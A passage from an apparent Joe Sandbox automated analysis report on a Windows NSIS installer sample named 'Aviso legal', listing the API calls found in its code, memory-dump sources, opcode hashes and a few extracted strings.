                                • Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                                • Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: CountTick$wsprintf
                                • String ID: *B$ A$ A$... %d%%$}8@
                                • API String ID: 551687249-3029848762
                                • Opcode ID: 005ae27f7b2a8b60ff4b8ab7505c874ce6cd52d3df2a7fc9a0352d90757565bf
                                • Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
                                • Opcode Fuzzy Hash: 005ae27f7b2a8b60ff4b8ab7505c874ce6cd52d3df2a7fc9a0352d90757565bf
                                • Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9
                                APIs
                                • GetWindowLongW.USER32(?,000000EB), ref: 0040451D
                                • GetSysColor.USER32(00000000), ref: 0040455B
                                • SetTextColor.GDI32(?,00000000), ref: 00404567
                                • SetBkMode.GDI32(?,?), ref: 00404573
                                • GetSysColor.USER32(?), ref: 00404586
                                • SetBkColor.GDI32(?,?), ref: 00404596
                                • DeleteObject.GDI32(?), ref: 004045B0
                                • CreateBrushIndirect.GDI32(?), ref: 004045BA
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                • String ID:
                                • API String ID: 2320649405-0
                                • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                                • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                                APIs
                                • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 00402793
                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,?,?,?,00000001), ref: 004027B6
                                • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 004027CC
                                  • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                • String ID: 9
                                • API String ID: 163830602-2366072709
                                • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                                • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                APIs
                                • lstrlenW.KERNEL32(0042C248,00000000,?,75E023A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                • lstrlenW.KERNEL32(00403418,0042C248,00000000,?,75E023A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                • lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
                                • SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                  • Part of subcall function 0040657A: lstrcatW.KERNEL32(00432EA0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                  • Part of subcall function 0040657A: lstrlenW.KERNEL32(00432EA0,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                • String ID:
                                • API String ID: 1495540970-0
                                • Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                                • Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68
                                APIs
                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                                • GetMessagePos.USER32 ref: 00404E77
                                • ScreenToClient.USER32(?,?), ref: 00404E91
                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: Message$Send$ClientScreen
                                • String ID: f
                                • API String ID: 41195575-1993550816
                                • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                                • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
                                APIs
                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                • MulDiv.KERNEL32(?,?,?), ref: 00402FDC
                                • wsprintfW.USER32 ref: 00402FEC
                                • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E
                                Strings
                                • verifying installer: %d%%, xrefs: 00402FE6
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: Text$ItemTimerWindowwsprintf
                                • String ID: verifying installer: %d%%
                                • API String ID: 1451636040-82062127
                                • Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                • Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
                                • Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                • Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69
                                APIs
                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                • wsprintfW.USER32 ref: 004068EC
                                • LoadLibraryExW.KERNEL32(?,00000000,?), ref: 00406900
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                • String ID: %s%S.dll$UXTHEME$\
                                • API String ID: 2200240437-1946221925
                                • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                • Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
                                • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                • Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8
                                APIs
                                  • Part of subcall function 0040602D: GetFileAttributesW.KERNEL32(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                  • Part of subcall function 0040602D: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                • GlobalAlloc.KERNEL32(?,?), ref: 004029B1
                                  • Part of subcall function 004034E5: SetFilePointer.KERNEL32(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                                • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 004029CD
                                • GlobalFree.KERNEL32(?), ref: 00402A06
                                • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                  • Part of subcall function 004032B4: GetTickCount.KERNEL32 ref: 0040331E
                                  • Part of subcall function 004032B4: GetTickCount.KERNEL32 ref: 004033C5
                                  • Part of subcall function 004032B4: MulDiv.KERNEL32(7FFFFFFF,?,?), ref: 004033EE
                                  • Part of subcall function 004032B4: wsprintfW.USER32 ref: 00403401
                                • CloseHandle.KERNEL32(?,?,?), ref: 00402A35
                                • DeleteFileW.KERNEL32(?), ref: 00402A48
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: FileGlobal$AllocCountFreeTick$AttributesCloseCreateDeleteHandlePointerwsprintf
                                • String ID:
                                • API String ID: 2082585436-0
                                • Opcode ID: 17dd76fc47bfb4dbddb85748dda62205a1ec4d3ad83027f951bb7188571398cb
                                • Instruction ID: 434b358d1c083f8bba1e209f71a36014b8a9c9b1db249c6204e039f9d1a2e10c
                                • Opcode Fuzzy Hash: 17dd76fc47bfb4dbddb85748dda62205a1ec4d3ad83027f951bb7188571398cb
                                • Instruction Fuzzy Hash: 36217F71D00114ABCF21AFA5DE888DEBE79EF08364F14423AF555762E0CA794C429B68
                                APIs
                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75E03420,00442800,?,00403508,00442800,00442800,00403810), ref: 00406827
                                • CharNextW.USER32(?,?,?,00000000,?,00403508,00442800,00442800,00403810), ref: 00406836
                                • CharNextW.USER32(?,00000000,75E03420,00442800,?,00403508,00442800,00442800,00403810), ref: 0040683B
                                • CharPrevW.USER32(?,?,75E03420,00442800,?,00403508,00442800,00442800,00403810), ref: 0040684E
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: Char$Next$Prev
                                • String ID: *?|<>/":
                                • API String ID: 589700163-165019052
                                • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                                • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                                APIs
                                • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                • CompareFileTime.KERNEL32(-00000014,?,0040A5F0,0040A5F0,00000000,00000000,0040A5F0,00441000,?,?,00000031), ref: 004017D5
                                  • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(0042C248,00000000,?,75E023A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,0042C248,00000000,?,75E023A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                  • Part of subcall function 0040559F: lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
                                  • Part of subcall function 0040559F: SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                • String ID:
                                • API String ID: 1941528284-0
                                • Opcode ID: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                                • Opcode Fuzzy Hash: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                                APIs
                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: CloseEnum$DeleteValue
                                • String ID:
                                • API String ID: 1354259210-0
                                • Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                                • Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                                APIs
                                • GetDC.USER32(?), ref: 00401E51
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                  • Part of subcall function 0040657A: lstrcatW.KERNEL32(00432EA0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                  • Part of subcall function 0040657A: lstrlenW.KERNEL32(00432EA0,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                                • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                Memory Dump Source
